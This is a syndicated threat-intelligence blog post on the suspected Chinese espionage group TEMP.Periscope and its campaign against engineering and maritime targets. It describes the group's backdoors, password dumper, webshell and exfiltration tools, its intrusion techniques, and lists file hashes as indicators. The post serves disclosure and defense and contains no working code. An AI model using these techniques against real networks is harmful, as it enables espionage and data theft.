Intrusions Focus on the Engineering and Maritime Sector
Since early 2018, FireEye (including our FireEye as a Service
(FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been
tracking an ongoing wave of intrusions targeting engineering and
maritime entities, especially those connected to South China Sea
issues. The campaign is linked to a group of suspected Chinese cyber
espionage actors we have tracked since 2013, dubbed TEMP.Periscope.
The group has also been reported as “Leviathan”
by other security firms.
The current campaign is a sharp escalation of detected activity
since summer 2017. Like multiple other Chinese cyber espionage actors,
TEMP.Periscope has recently re-emerged and has been observed
conducting operations with a revised toolkit. Known targets of this
group have been involved in the maritime industry, as well as
engineering-focused entities, and include research institutes,
academic organizations, and private firms in the United States.
FireEye products have robust detection for the malware used in this campaign.
TEMP.Periscope Background
Active since at least 2013, TEMP.Periscope has primarily focused on
maritime-related targets across multiple verticals, including
engineering firms, shipping and transportation, manufacturing,
defense, government offices, and research universities. However, the
group has also targeted professional/consulting services, high-tech
industry, healthcare, and media/publishing. Identified victims were
mostly found in the United States, although organizations in Europe
and at least one in Hong Kong have also been affected. TEMP.Periscope
overlaps in targeting, as well as tactics, techniques, and procedures
(TTPs), with TEMP.Jumper, a group that also overlaps significantly
with public reporting on “NanHaiShu.”
TTPs and Malware Used
In their recent spike in activity, TEMP.Periscope has leveraged a
relatively large library of malware shared with multiple other
suspected Chinese groups. These tools include:
- AIRBREAK: a
JavaScript-based backdoor also reported as “Orz” that retrieves
commands from hidden strings in compromised webpages and actor
controlled profiles on legitimate services. - BADFLICK: a
backdoor that is capable of modifying the file system, generating a
reverse shell, and modifying its command and control (C2)
configuration. - PHOTO: a DLL backdoor also reported publicly
as “Derusbi”, capable of obtaining directory, file, and drive
listing; creating a reverse shell; performing screen captures;
recording video and audio; listing, terminating, and creating
processes; enumerating, starting, and deleting registry keys and
values; logging keystrokes, returning usernames and passwords from
protected storage; and renaming, deleting, copying, moving, reading,
and writing to files. - HOMEFRY: a 64-bit Windows password
dumper/cracker that has previously been used in conjunction with
AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with
XOR x56. The malware accepts up to two arguments at the command
line: one to display cleartext credentials for each login session,
and a second to display cleartext credentials, NTLM hashes, and
malware version for each login session. - LUNCHMONEY: an
uploader that can exfiltrate files to Dropbox. - MURKYTOP: a
command-line reconnaissance tool. It can be used to execute files as
a different user, move, and delete files locally, schedule remote AT
jobs, perform host discovery on connected networks, scan for open
ports on hosts in a connected network, and retrieve information
about the OS, users, groups, and shares on remote hosts. - China Chopper: a simple code injection webshell that executes
Microsoft .NET code within HTTP POST commands. This allows the shell
to upload and download files, execute applications with web server
account permissions, list directory contents, access Active
Directory, access databases, and any other action allowed by the
.NET runtime.
The following are tools that TEMP.Periscope has leveraged in past
operations and could use again, though these have not been seen in the
current wave of activity:
- Beacon: a backdoor that
is commercially available as part of the Cobalt Strike software
platform, commonly used for pen-testing network environments. The
malware supports several capabilities, such as injecting and
executing arbitrary code, uploading and downloading files, and
executing shell commands. - BLACKCOFFEE:
a backdoor that obfuscates its communications as normal traffic to
legitimate websites such as Github and Microsoft’s Technet portal.
Used by APT17 and
other Chinese cyber espionage operators.
Additional identifying TTPs include:
- Spear phishing, including
the use of probably compromised email accounts. - Lure
documents using CVE-2017-11882 to drop malware. - Stolen code
signing certificates used to sign malware. - Use of
bitsadmin.exe to download additional tools. - Use of
PowerShell to download additional tools. - Using
C:\Windows\Debug and C:\Perflogs as staging directories. - Leveraging Hyperhost VPS and Proton VPN exit nodes to access
webshells on internet-facing systems. - Using Windows
Management Instrumentation (WMI)
for persistence. - Using Windows Shortcut files (.lnk)
in the Startup folder that invoke the Windows Scripting Host
(wscript.exe) to execute a Jscript backdoor for persistence. - Receiving C2 instructions from user profiles created by the
adversary on legitimate websites/forums such as Github and
Microsoft’s TechNet portal.
Implications
The current wave of identified intrusions is consistent with
TEMP.Periscope and likely reflects a concerted effort to target
sectors that may yield information that could provide an economic
advantage, research and development data, intellectual property, or an
edge in commercial negotiations.
As we continue to investigate this activity, we may identify
additional data leading to greater analytical confidence linking the
operation to TEMP.Periscope or other known threat actors, as well as
previously unknown campaigns.
Indicators
|
File |
Hash |
Description |
|
x.js |
3fefa55daeb167931975c22df3eca20a |
HOMEFRY, a 64-bit Windows password |
|
mt.exe |
40528e368d323db0ac5c3f5e1efe4889 |
MURKYTOP, a command-line |
|
com4.js |
a68bf5fce22e7f1d6f999b7a580ae477 |
AIRBREAK, a JavaScript-based |
Historical Indicators
|
File |
Hash |
Description |
|
green.ddd |
3eb6f85ac046a96204096ab65bbd3e7e |
AIRBREAK, a JavaScript-based |
|
BGij |
6e843ef4856336fe3ef4ed27a4c792b1 |
Beacon, a commercially available |
|
msresamn.ttf |
a9e7539c1ebe857bae6efceefaa9dd16 |
PHOTO, also reported as |
|
1024-aa6a121f98330df2edee6c4391df21ff43a33604 |
bd9e4c82bf12c4e7a58221fc52fed705 |
BADFLICK, backdoor that is capable |
This is a Security Bloggers Network syndicated blog post authored by Nick Harbour. Read the original post at: Threat Research Blog